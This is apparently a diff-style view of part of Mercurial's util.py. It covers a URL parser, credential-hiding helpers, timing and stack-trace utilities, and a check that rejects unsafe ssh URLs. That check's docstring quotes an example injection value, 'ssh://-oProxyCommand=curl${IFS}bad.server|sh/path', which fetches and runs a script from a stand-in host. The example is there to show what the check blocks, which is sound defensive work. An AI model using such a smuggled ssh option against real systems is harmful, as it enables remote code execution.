2690 """Parse s into a boolean.
2695 """Parse s into a boolean.
2691
2696
2692 If s is not a valid boolean, returns None.
2697 If s is not a valid boolean, returns None.
2693 """
2698 """
2694 return _booleans.get(s.lower(), None)
2699 return _booleans.get(s.lower(), None)
2695
2700
2696 _hextochr = dict((a + b, chr(int(a + b, 16)))
2701 _hextochr = dict((a + b, chr(int(a + b, 16)))
2697 for a in string.hexdigits for b in string.hexdigits)
2702 for a in string.hexdigits for b in string.hexdigits)
2698
2703
2699 class url(object):
2704 class url(object):
2700 r"""Reliable URL parser.
2705 r"""Reliable URL parser.
2701
2706
2702 This parses URLs and provides attributes for the following
2707 This parses URLs and provides attributes for the following
2703 components:
2708 components:
2704
2709
2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2710 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2706
2711
2707 Missing components are set to None. The only exception is
2712 Missing components are set to None. The only exception is
2708 fragment, which is set to '' if present but empty.
2713 fragment, which is set to '' if present but empty.
2709
2714
2710 If parsefragment is False, fragment is included in query. If
2715 If parsefragment is False, fragment is included in query. If
2711 parsequery is False, query is included in path. If both are
2716 parsequery is False, query is included in path. If both are
2712 False, both fragment and query are included in path.
2717 False, both fragment and query are included in path.
2713
2718
2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2719 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2715
2720
2716 Note that for backward compatibility reasons, bundle URLs do not
2721 Note that for backward compatibility reasons, bundle URLs do not
2717 take host names. That means 'bundle://../' has a path of '../'.
2722 take host names. That means 'bundle://../' has a path of '../'.
2718
2723
2719 Examples:
2724 Examples:
2720
2725
2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2726 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2727 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2728 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2729 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2725 >>> url(b'file:///home/joe/repo')
2730 >>> url(b'file:///home/joe/repo')
2726 <url scheme: 'file', path: '/home/joe/repo'>
2731 <url scheme: 'file', path: '/home/joe/repo'>
2727 >>> url(b'file:///c:/temp/foo/')
2732 >>> url(b'file:///c:/temp/foo/')
2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2733 <url scheme: 'file', path: 'c:/temp/foo/'>
2729 >>> url(b'bundle:foo')
2734 >>> url(b'bundle:foo')
2730 <url scheme: 'bundle', path: 'foo'>
2735 <url scheme: 'bundle', path: 'foo'>
2731 >>> url(b'bundle://../foo')
2736 >>> url(b'bundle://../foo')
2732 <url scheme: 'bundle', path: '../foo'>
2737 <url scheme: 'bundle', path: '../foo'>
2733 >>> url(br'c:\foo\bar')
2738 >>> url(br'c:\foo\bar')
2734 <url path: 'c:\\foo\\bar'>
2739 <url path: 'c:\\foo\\bar'>
2735 >>> url(br'\\blah\blah\blah')
2740 >>> url(br'\\blah\blah\blah')
2736 <url path: '\\\\blah\\blah\\blah'>
2741 <url path: '\\\\blah\\blah\\blah'>
2737 >>> url(br'\\blah\blah\blah#baz')
2742 >>> url(br'\\blah\blah\blah#baz')
2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2743 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2739 >>> url(br'file:///C:\users\me')
2744 >>> url(br'file:///C:\users\me')
2740 <url scheme: 'file', path: 'C:\\users\\me'>
2745 <url scheme: 'file', path: 'C:\\users\\me'>
2741
2746
2742 Authentication credentials:
2747 Authentication credentials:
2743
2748
2744 >>> url(b'ssh://joe:xyz@x/repo')
2749 >>> url(b'ssh://joe:xyz@x/repo')
2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2750 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2746 >>> url(b'ssh://joe@x/repo')
2751 >>> url(b'ssh://joe@x/repo')
2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2752 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2748
2753
2749 Query strings and fragments:
2754 Query strings and fragments:
2750
2755
2751 >>> url(b'http://host/a?b#c')
2756 >>> url(b'http://host/a?b#c')
2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2757 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2758 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2759 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2755
2760
2756 Empty path:
2761 Empty path:
2757
2762
2758 >>> url(b'')
2763 >>> url(b'')
2759 <url path: ''>
2764 <url path: ''>
2760 >>> url(b'#a')
2765 >>> url(b'#a')
2761 <url path: '', fragment: 'a'>
2766 <url path: '', fragment: 'a'>
2762 >>> url(b'http://host/')
2767 >>> url(b'http://host/')
2763 <url scheme: 'http', host: 'host', path: ''>
2768 <url scheme: 'http', host: 'host', path: ''>
2764 >>> url(b'http://host/#a')
2769 >>> url(b'http://host/#a')
2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2770 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2766
2771
2767 Only scheme:
2772 Only scheme:
2768
2773
2769 >>> url(b'http:')
2774 >>> url(b'http:')
2770 <url scheme: 'http'>
2775 <url scheme: 'http'>
2771 """
2776 """
2772
2777
2773 _safechars = "!~*'()+"
2778 _safechars = "!~*'()+"
2774 _safepchars = "/!~*'()+:\\"
2779 _safepchars = "/!~*'()+:\\"
2775 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2780 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2776
2781
2777 def __init__(self, path, parsequery=True, parsefragment=True):
2782 def __init__(self, path, parsequery=True, parsefragment=True):
2778 # We slowly chomp away at path until we have only the path left
2783 # We slowly chomp away at path until we have only the path left
2779 self.scheme = self.user = self.passwd = self.host = None
2784 self.scheme = self.user = self.passwd = self.host = None
2780 self.port = self.path = self.query = self.fragment = None
2785 self.port = self.path = self.query = self.fragment = None
2781 self._localpath = True
2786 self._localpath = True
2782 self._hostport = ''
2787 self._hostport = ''
2783 self._origpath = path
2788 self._origpath = path
2784
2789
2785 if parsefragment and '#' in path:
2790 if parsefragment and '#' in path:
2786 path, self.fragment = path.split('#', 1)
2791 path, self.fragment = path.split('#', 1)
2787
2792
2788 # special case for Windows drive letters and UNC paths
2793 # special case for Windows drive letters and UNC paths
2789 if hasdriveletter(path) or path.startswith('\\\\'):
2794 if hasdriveletter(path) or path.startswith('\\\\'):
2790 self.path = path
2795 self.path = path
2791 return
2796 return
2792
2797
2793 # For compatibility reasons, we can't handle bundle paths as
2798 # For compatibility reasons, we can't handle bundle paths as
2794 # normal URLS
2799 # normal URLS
2795 if path.startswith('bundle:'):
2800 if path.startswith('bundle:'):
2796 self.scheme = 'bundle'
2801 self.scheme = 'bundle'
2797 path = path[7:]
2802 path = path[7:]
2798 if path.startswith('//'):
2803 if path.startswith('//'):
2799 path = path[2:]
2804 path = path[2:]
2800 self.path = path
2805 self.path = path
2801 return
2806 return
2802
2807
2803 if self._matchscheme(path):
2808 if self._matchscheme(path):
2804 parts = path.split(':', 1)
2809 parts = path.split(':', 1)
2805 if parts[0]:
2810 if parts[0]:
2806 self.scheme, path = parts
2811 self.scheme, path = parts
2807 self._localpath = False
2812 self._localpath = False
2808
2813
2809 if not path:
2814 if not path:
2810 path = None
2815 path = None
2811 if self._localpath:
2816 if self._localpath:
2812 self.path = ''
2817 self.path = ''
2813 return
2818 return
2814 else:
2819 else:
2815 if self._localpath:
2820 if self._localpath:
2816 self.path = path
2821 self.path = path
2817 return
2822 return
2818
2823
2819 if parsequery and '?' in path:
2824 if parsequery and '?' in path:
2820 path, self.query = path.split('?', 1)
2825 path, self.query = path.split('?', 1)
2821 if not path:
2826 if not path:
2822 path = None
2827 path = None
2823 if not self.query:
2828 if not self.query:
2824 self.query = None
2829 self.query = None
2825
2830
2826 # // is required to specify a host/authority
2831 # // is required to specify a host/authority
2827 if path and path.startswith('//'):
2832 if path and path.startswith('//'):
2828 parts = path[2:].split('/', 1)
2833 parts = path[2:].split('/', 1)
2829 if len(parts) > 1:
2834 if len(parts) > 1:
2830 self.host, path = parts
2835 self.host, path = parts
2831 else:
2836 else:
2832 self.host = parts[0]
2837 self.host = parts[0]
2833 path = None
2838 path = None
2834 if not self.host:
2839 if not self.host:
2835 self.host = None
2840 self.host = None
2836 # path of file:///d is /d
2841 # path of file:///d is /d
2837 # path of file:///d:/ is d:/, not /d:/
2842 # path of file:///d:/ is d:/, not /d:/
2838 if path and not hasdriveletter(path):
2843 if path and not hasdriveletter(path):
2839 path = '/' + path
2844 path = '/' + path
2840
2845
2841 if self.host and '@' in self.host:
2846 if self.host and '@' in self.host:
2842 self.user, self.host = self.host.rsplit('@', 1)
2847 self.user, self.host = self.host.rsplit('@', 1)
2843 if ':' in self.user:
2848 if ':' in self.user:
2844 self.user, self.passwd = self.user.split(':', 1)
2849 self.user, self.passwd = self.user.split(':', 1)
2845 if not self.host:
2850 if not self.host:
2846 self.host = None
2851 self.host = None
2847
2852
2848 # Don't split on colons in IPv6 addresses without ports
2853 # Don't split on colons in IPv6 addresses without ports
2849 if (self.host and ':' in self.host and
2854 if (self.host and ':' in self.host and
2850 not (self.host.startswith('[') and self.host.endswith(']'))):
2855 not (self.host.startswith('[') and self.host.endswith(']'))):
2851 self._hostport = self.host
2856 self._hostport = self.host
2852 self.host, self.port = self.host.rsplit(':', 1)
2857 self.host, self.port = self.host.rsplit(':', 1)
2853 if not self.host:
2858 if not self.host:
2854 self.host = None
2859 self.host = None
2855
2860
2856 if (self.host and self.scheme == 'file' and
2861 if (self.host and self.scheme == 'file' and
2857 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2862 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2858 raise Abort(_('file:// URLs can only refer to localhost'))
2863 raise Abort(_('file:// URLs can only refer to localhost'))
2859
2864
2860 self.path = path
2865 self.path = path
2861
2866
2862 # leave the query string escaped
2867 # leave the query string escaped
2863 for a in ('user', 'passwd', 'host', 'port',
2868 for a in ('user', 'passwd', 'host', 'port',
2864 'path', 'fragment'):
2869 'path', 'fragment'):
2865 v = getattr(self, a)
2870 v = getattr(self, a)
2866 if v is not None:
2871 if v is not None:
2867 setattr(self, a, urlreq.unquote(v))
2872 setattr(self, a, urlreq.unquote(v))
2868
2873
2869 @encoding.strmethod
2874 @encoding.strmethod
2870 def __repr__(self):
2875 def __repr__(self):
2871 attrs = []
2876 attrs = []
2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2877 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2873 'query', 'fragment'):
2878 'query', 'fragment'):
2874 v = getattr(self, a)
2879 v = getattr(self, a)
2875 if v is not None:
2880 if v is not None:
2876 attrs.append('%s: %r' % (a, v))
2881 attrs.append('%s: %r' % (a, v))
2877 return '<url %s>' % ', '.join(attrs)
2882 return '<url %s>' % ', '.join(attrs)
2878
2883
2879 def __bytes__(self):
2884 def __bytes__(self):
2880 r"""Join the URL's components back into a URL string.
2885 r"""Join the URL's components back into a URL string.
2881
2886
2882 Examples:
2887 Examples:
2883
2888
2884 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2889 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2885 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2890 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2886 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2891 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2887 'http://user:pw@host:80/?foo=bar&baz=42'
2892 'http://user:pw@host:80/?foo=bar&baz=42'
2888 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2893 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2889 'http://user:pw@host:80/?foo=bar%3dbaz'
2894 'http://user:pw@host:80/?foo=bar%3dbaz'
2890 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2895 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2891 'ssh://user:pw@[::1]:2200//home/joe#'
2896 'ssh://user:pw@[::1]:2200//home/joe#'
2892 >>> bytes(url(b'http://localhost:80//'))
2897 >>> bytes(url(b'http://localhost:80//'))
2893 'http://localhost:80//'
2898 'http://localhost:80//'
2894 >>> bytes(url(b'http://localhost:80/'))
2899 >>> bytes(url(b'http://localhost:80/'))
2895 'http://localhost:80/'
2900 'http://localhost:80/'
2896 >>> bytes(url(b'http://localhost:80'))
2901 >>> bytes(url(b'http://localhost:80'))
2897 'http://localhost:80/'
2902 'http://localhost:80/'
2898 >>> bytes(url(b'bundle:foo'))
2903 >>> bytes(url(b'bundle:foo'))
2899 'bundle:foo'
2904 'bundle:foo'
2900 >>> bytes(url(b'bundle://../foo'))
2905 >>> bytes(url(b'bundle://../foo'))
2901 'bundle:../foo'
2906 'bundle:../foo'
2902 >>> bytes(url(b'path'))
2907 >>> bytes(url(b'path'))
2903 'path'
2908 'path'
2904 >>> bytes(url(b'file:///tmp/foo/bar'))
2909 >>> bytes(url(b'file:///tmp/foo/bar'))
2905 'file:///tmp/foo/bar'
2910 'file:///tmp/foo/bar'
2906 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2911 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2907 'file:///c:/tmp/foo/bar'
2912 'file:///c:/tmp/foo/bar'
2908 >>> print(url(br'bundle:foo\bar'))
2913 >>> print(url(br'bundle:foo\bar'))
2909 bundle:foo\bar
2914 bundle:foo\bar
2910 >>> print(url(br'file:///D:\data\hg'))
2915 >>> print(url(br'file:///D:\data\hg'))
2911 file:///D:\data\hg
2916 file:///D:\data\hg
2912 """
2917 """
2913 if self._localpath:
2918 if self._localpath:
2914 s = self.path
2919 s = self.path
2915 if self.scheme == 'bundle':
2920 if self.scheme == 'bundle':
2916 s = 'bundle:' + s
2921 s = 'bundle:' + s
2917 if self.fragment:
2922 if self.fragment:
2918 s += '#' + self.fragment
2923 s += '#' + self.fragment
2919 return s
2924 return s
2920
2925
2921 s = self.scheme + ':'
2926 s = self.scheme + ':'
2922 if self.user or self.passwd or self.host:
2927 if self.user or self.passwd or self.host:
2923 s += '//'
2928 s += '//'
2924 elif self.scheme and (not self.path or self.path.startswith('/')
2929 elif self.scheme and (not self.path or self.path.startswith('/')
2925 or hasdriveletter(self.path)):
2930 or hasdriveletter(self.path)):
2926 s += '//'
2931 s += '//'
2927 if hasdriveletter(self.path):
2932 if hasdriveletter(self.path):
2928 s += '/'
2933 s += '/'
2929 if self.user:
2934 if self.user:
2930 s += urlreq.quote(self.user, safe=self._safechars)
2935 s += urlreq.quote(self.user, safe=self._safechars)
2931 if self.passwd:
2936 if self.passwd:
2932 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2937 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2933 if self.user or self.passwd:
2938 if self.user or self.passwd:
2934 s += '@'
2939 s += '@'
2935 if self.host:
2940 if self.host:
2936 if not (self.host.startswith('[') and self.host.endswith(']')):
2941 if not (self.host.startswith('[') and self.host.endswith(']')):
2937 s += urlreq.quote(self.host)
2942 s += urlreq.quote(self.host)
2938 else:
2943 else:
2939 s += self.host
2944 s += self.host
2940 if self.port:
2945 if self.port:
2941 s += ':' + urlreq.quote(self.port)
2946 s += ':' + urlreq.quote(self.port)
2942 if self.host:
2947 if self.host:
2943 s += '/'
2948 s += '/'
2944 if self.path:
2949 if self.path:
2945 # TODO: similar to the query string, we should not unescape the
2950 # TODO: similar to the query string, we should not unescape the
2946 # path when we store it, the path might contain '%2f' = '/',
2951 # path when we store it, the path might contain '%2f' = '/',
2947 # which we should *not* escape.
2952 # which we should *not* escape.
2948 s += urlreq.quote(self.path, safe=self._safepchars)
2953 s += urlreq.quote(self.path, safe=self._safepchars)
2949 if self.query:
2954 if self.query:
2950 # we store the query in escaped form.
2955 # we store the query in escaped form.
2951 s += '?' + self.query
2956 s += '?' + self.query
2952 if self.fragment is not None:
2957 if self.fragment is not None:
2953 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2958 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2954 return s
2959 return s
2955
2960
2956 __str__ = encoding.strmethod(__bytes__)
2961 __str__ = encoding.strmethod(__bytes__)
2957
2962
2958 def authinfo(self):
2963 def authinfo(self):
2959 user, passwd = self.user, self.passwd
2964 user, passwd = self.user, self.passwd
2960 try:
2965 try:
2961 self.user, self.passwd = None, None
2966 self.user, self.passwd = None, None
2962 s = bytes(self)
2967 s = bytes(self)
2963 finally:
2968 finally:
2964 self.user, self.passwd = user, passwd
2969 self.user, self.passwd = user, passwd
2965 if not self.user:
2970 if not self.user:
2966 return (s, None)
2971 return (s, None)
2967 # authinfo[1] is passed to urllib2 password manager, and its
2972 # authinfo[1] is passed to urllib2 password manager, and its
2968 # URIs must not contain credentials. The host is passed in the
2973 # URIs must not contain credentials. The host is passed in the
2969 # URIs list because Python < 2.4.3 uses only that to search for
2974 # URIs list because Python < 2.4.3 uses only that to search for
2970 # a password.
2975 # a password.
2971 return (s, (None, (s, self.host),
2976 return (s, (None, (s, self.host),
2972 self.user, self.passwd or ''))
2977 self.user, self.passwd or ''))
2973
2978
2974 def isabs(self):
2979 def isabs(self):
2975 if self.scheme and self.scheme != 'file':
2980 if self.scheme and self.scheme != 'file':
2976 return True # remote URL
2981 return True # remote URL
2977 if hasdriveletter(self.path):
2982 if hasdriveletter(self.path):
2978 return True # absolute for our purposes - can't be joined()
2983 return True # absolute for our purposes - can't be joined()
2979 if self.path.startswith(br'\\'):
2984 if self.path.startswith(br'\\'):
2980 return True # Windows UNC path
2985 return True # Windows UNC path
2981 if self.path.startswith('/'):
2986 if self.path.startswith('/'):
2982 return True # POSIX-style
2987 return True # POSIX-style
2983 return False
2988 return False
2984
2989
2985 def localpath(self):
2990 def localpath(self):
2986 if self.scheme == 'file' or self.scheme == 'bundle':
2991 if self.scheme == 'file' or self.scheme == 'bundle':
2987 path = self.path or '/'
2992 path = self.path or '/'
2988 # For Windows, we need to promote hosts containing drive
2993 # For Windows, we need to promote hosts containing drive
2989 # letters to paths with drive letters.
2994 # letters to paths with drive letters.
2990 if hasdriveletter(self._hostport):
2995 if hasdriveletter(self._hostport):
2991 path = self._hostport + '/' + self.path
2996 path = self._hostport + '/' + self.path
2992 elif (self.host is not None and self.path
2997 elif (self.host is not None and self.path
2993 and not hasdriveletter(path)):
2998 and not hasdriveletter(path)):
2994 path = '/' + path
2999 path = '/' + path
2995 return path
3000 return path
2996 return self._origpath
3001 return self._origpath
2997
3002
2998 def islocal(self):
3003 def islocal(self):
2999 '''whether localpath will return something that posixfile can open'''
3004 '''whether localpath will return something that posixfile can open'''
3000 return (not self.scheme or self.scheme == 'file'
3005 return (not self.scheme or self.scheme == 'file'
3001 or self.scheme == 'bundle')
3006 or self.scheme == 'bundle')
3002
3007
3003 def hasscheme(path):
3008 def hasscheme(path):
3004 return bool(url(path).scheme)
3009 return bool(url(path).scheme)
3005
3010
3006 def hasdriveletter(path):
3011 def hasdriveletter(path):
3007 return path and path[1:2] == ':' and path[0:1].isalpha()
3012 return path and path[1:2] == ':' and path[0:1].isalpha()
3008
3013
3009 def urllocalpath(path):
3014 def urllocalpath(path):
3010 return url(path, parsequery=False, parsefragment=False).localpath()
3015 return url(path, parsequery=False, parsefragment=False).localpath()
3011
3016
3012 def checksafessh(path):
3017 def checksafessh(path):
3013 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3018 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3014
3019
3015 This is a sanity check for ssh urls. ssh will parse the first item as
3020 This is a sanity check for ssh urls. ssh will parse the first item as
3016 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3021 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3017 Let's prevent these potentially exploited urls entirely and warn the
3022 Let's prevent these potentially exploited urls entirely and warn the
3018 user.
3023 user.
3019
3024
3020 Raises an error.Abort when the url is unsafe.
3025 Raises an error.Abort when the url is unsafe.
3021 """
3026 """
3022 path = urlreq.unquote(path)
3027 path = urlreq.unquote(path)
3023 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3028 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3024 raise error.Abort(_('potentially unsafe url: %r') %
3029 raise error.Abort(_('potentially unsafe url: %r') %
3025 (path,))
3030 (path,))
3026
3031
3027 def hidepassword(u):
3032 def hidepassword(u):
3028 '''hide user credential in a url string'''
3033 '''hide user credential in a url string'''
3029 u = url(u)
3034 u = url(u)
3030 if u.passwd:
3035 if u.passwd:
3031 u.passwd = '***'
3036 u.passwd = '***'
3032 return bytes(u)
3037 return bytes(u)
3033
3038
3034 def removeauth(u):
3039 def removeauth(u):
3035 '''remove all authentication information from a url string'''
3040 '''remove all authentication information from a url string'''
3036 u = url(u)
3041 u = url(u)
3037 u.user = u.passwd = None
3042 u.user = u.passwd = None
3038 return str(u)
3043 return str(u)
3039
3044
3040 timecount = unitcountfn(
3045 timecount = unitcountfn(
3041 (1, 1e3, _('%.0f s')),
3046 (1, 1e3, _('%.0f s')),
3042 (100, 1, _('%.1f s')),
3047 (100, 1, _('%.1f s')),
3043 (10, 1, _('%.2f s')),
3048 (10, 1, _('%.2f s')),
3044 (1, 1, _('%.3f s')),
3049 (1, 1, _('%.3f s')),
3045 (100, 0.001, _('%.1f ms')),
3050 (100, 0.001, _('%.1f ms')),
3046 (10, 0.001, _('%.2f ms')),
3051 (10, 0.001, _('%.2f ms')),
3047 (1, 0.001, _('%.3f ms')),
3052 (1, 0.001, _('%.3f ms')),
3048 (100, 0.000001, _('%.1f us')),
3053 (100, 0.000001, _('%.1f us')),
3049 (10, 0.000001, _('%.2f us')),
3054 (10, 0.000001, _('%.2f us')),
3050 (1, 0.000001, _('%.3f us')),
3055 (1, 0.000001, _('%.3f us')),
3051 (100, 0.000000001, _('%.1f ns')),
3056 (100, 0.000000001, _('%.1f ns')),
3052 (10, 0.000000001, _('%.2f ns')),
3057 (10, 0.000000001, _('%.2f ns')),
3053 (1, 0.000000001, _('%.3f ns')),
3058 (1, 0.000000001, _('%.3f ns')),
3054 )
3059 )
3055
3060
3056 _timenesting = [0]
3061 _timenesting = [0]
3057
3062
3058 def timed(func):
3063 def timed(func):
3059 '''Report the execution time of a function call to stderr.
3064 '''Report the execution time of a function call to stderr.
3060
3065
3061 During development, use as a decorator when you need to measure
3066 During development, use as a decorator when you need to measure
3062 the cost of a function, e.g. as follows:
3067 the cost of a function, e.g. as follows:
3063
3068
3064 @util.timed
3069 @util.timed
3065 def foo(a, b, c):
3070 def foo(a, b, c):
3066 pass
3071 pass
3067 '''
3072 '''
3068
3073
3069 def wrapper(*args, **kwargs):
3074 def wrapper(*args, **kwargs):
3070 start = timer()
3075 start = timer()
3071 indent = 2
3076 indent = 2
3072 _timenesting[0] += indent
3077 _timenesting[0] += indent
3073 try:
3078 try:
3074 return func(*args, **kwargs)
3079 return func(*args, **kwargs)
3075 finally:
3080 finally:
3076 elapsed = timer() - start
3081 elapsed = timer() - start
3077 _timenesting[0] -= indent
3082 _timenesting[0] -= indent
3078 stderr.write('%s%s: %s\n' %
3083 stderr.write('%s%s: %s\n' %
3079 (' ' * _timenesting[0], func.__name__,
3084 (' ' * _timenesting[0], func.__name__,
3080 timecount(elapsed)))
3085 timecount(elapsed)))
3081 return wrapper
3086 return wrapper
3082
3087
3083 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3088 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3084 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3089 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3085
3090
3086 def sizetoint(s):
3091 def sizetoint(s):
3087 '''Convert a space specifier to a byte count.
3092 '''Convert a space specifier to a byte count.
3088
3093
3089 >>> sizetoint(b'30')
3094 >>> sizetoint(b'30')
3090 30
3095 30
3091 >>> sizetoint(b'2.2kb')
3096 >>> sizetoint(b'2.2kb')
3092 2252
3097 2252
3093 >>> sizetoint(b'6M')
3098 >>> sizetoint(b'6M')
3094 6291456
3099 6291456
3095 '''
3100 '''
3096 t = s.strip().lower()
3101 t = s.strip().lower()
3097 try:
3102 try:
3098 for k, u in _sizeunits:
3103 for k, u in _sizeunits:
3099 if t.endswith(k):
3104 if t.endswith(k):
3100 return int(float(t[:-len(k)]) * u)
3105 return int(float(t[:-len(k)]) * u)
3101 return int(t)
3106 return int(t)
3102 except ValueError:
3107 except ValueError:
3103 raise error.ParseError(_("couldn't parse size: %s") % s)
3108 raise error.ParseError(_("couldn't parse size: %s") % s)
3104
3109
3105 class hooks(object):
3110 class hooks(object):
3106 '''A collection of hook functions that can be used to extend a
3111 '''A collection of hook functions that can be used to extend a
3107 function's behavior. Hooks are called in lexicographic order,
3112 function's behavior. Hooks are called in lexicographic order,
3108 based on the names of their sources.'''
3113 based on the names of their sources.'''
3109
3114
3110 def __init__(self):
3115 def __init__(self):
3111 self._hooks = []
3116 self._hooks = []
3112
3117
3113 def add(self, source, hook):
3118 def add(self, source, hook):
3114 self._hooks.append((source, hook))
3119 self._hooks.append((source, hook))
3115
3120
3116 def __call__(self, *args):
3121 def __call__(self, *args):
3117 self._hooks.sort(key=lambda x: x[0])
3122 self._hooks.sort(key=lambda x: x[0])
3118 results = []
3123 results = []
3119 for source, hook in self._hooks:
3124 for source, hook in self._hooks:
3120 results.append(hook(*args))
3125 results.append(hook(*args))
3121 return results
3126 return results
3122
3127
3123 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3128 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3124 '''Yields lines for a nicely formatted stacktrace.
3129 '''Yields lines for a nicely formatted stacktrace.
3125 Skips the 'skip' last entries, then return the last 'depth' entries.
3130 Skips the 'skip' last entries, then return the last 'depth' entries.
3126 Each file+linenumber is formatted according to fileline.
3131 Each file+linenumber is formatted according to fileline.
3127 Each line is formatted according to line.
3132 Each line is formatted according to line.
3128 If line is None, it yields:
3133 If line is None, it yields:
3129 length of longest filepath+line number,
3134 length of longest filepath+line number,
3130 filepath+linenumber,
3135 filepath+linenumber,
3131 function
3136 function
3132
3137
3133 Not be used in production code but very convenient while developing.
3138 Not be used in production code but very convenient while developing.
3134 '''
3139 '''
3135 entries = [(fileline % (fn, ln), func)
3140 entries = [(fileline % (fn, ln), func)
3136 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3141 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3137 ][-depth:]
3142 ][-depth:]
3138 if entries:
3143 if entries:
3139 fnmax = max(len(entry[0]) for entry in entries)
3144 fnmax = max(len(entry[0]) for entry in entries)
3140 for fnln, func in entries:
3145 for fnln, func in entries:
3141 if line is None:
3146 if line is None:
3142 yield (fnmax, fnln, func)
3147 yield (fnmax, fnln, func)
3143 else:
3148 else:
3144 yield line % (fnmax, fnln, func)
3149 yield line % (fnmax, fnln, func)
3145
3150
3146 def debugstacktrace(msg='stacktrace', skip=0,
3151 def debugstacktrace(msg='stacktrace', skip=0,
3147 f=stderr, otherf=stdout, depth=0):
3152 f=stderr, otherf=stdout, depth=0):
3148 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3153 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3149 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3154 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3150 By default it will flush stdout first.
3155 By default it will flush stdout first.
3151 It can be used everywhere and intentionally does not require an ui object.
3156 It can be used everywhere and intentionally does not require an ui object.
3152 Not be used in production code but very convenient while developing.
3157 Not be used in production code but very convenient while developing.
3153 '''
3158 '''
3154 if otherf:
3159 if otherf:
3155 otherf.flush()
3160 otherf.flush()
3156 f.write('%s at:\n' % msg.rstrip())
3161 f.write('%s at:\n' % msg.rstrip())
3157 for line in getstackframes(skip + 1, depth=depth):
3162 for line in getstackframes(skip + 1, depth=depth):
3158 f.write(line)
3163 f.write(line)
3159 f.flush()
3164 f.flush()
3160
3165
3161 class dirs(object):
3166 class dirs(object):
3162 '''a multiset of directory names from a dirstate or manifest'''
3167 '''a multiset of directory names from a dirstate or manifest'''
3163
3168
3164 def __init__(self, map, skip=None):
3169 def __init__(self, map, skip=None):
3165 self._dirs = {}
3170 self._dirs = {}
3166 addpath = self.addpath
3171 addpath = self.addpath
3167 if safehasattr(map, 'iteritems') and skip is not None:
3172 if safehasattr(map, 'iteritems') and skip is not None:
3168 for f, s in map.iteritems():
3173 for f, s in map.iteritems():
3169 if s[0] != skip:
3174 if s[0] != skip:
3170 addpath(f)
3175 addpath(f)
3171 else:
3176 else:
3172 for f in map:
3177 for f in map:
3173 addpath(f)
3178 addpath(f)
3174
3179
3175 def addpath(self, path):
3180 def addpath(self, path):
3176 dirs = self._dirs
3181 dirs = self._dirs
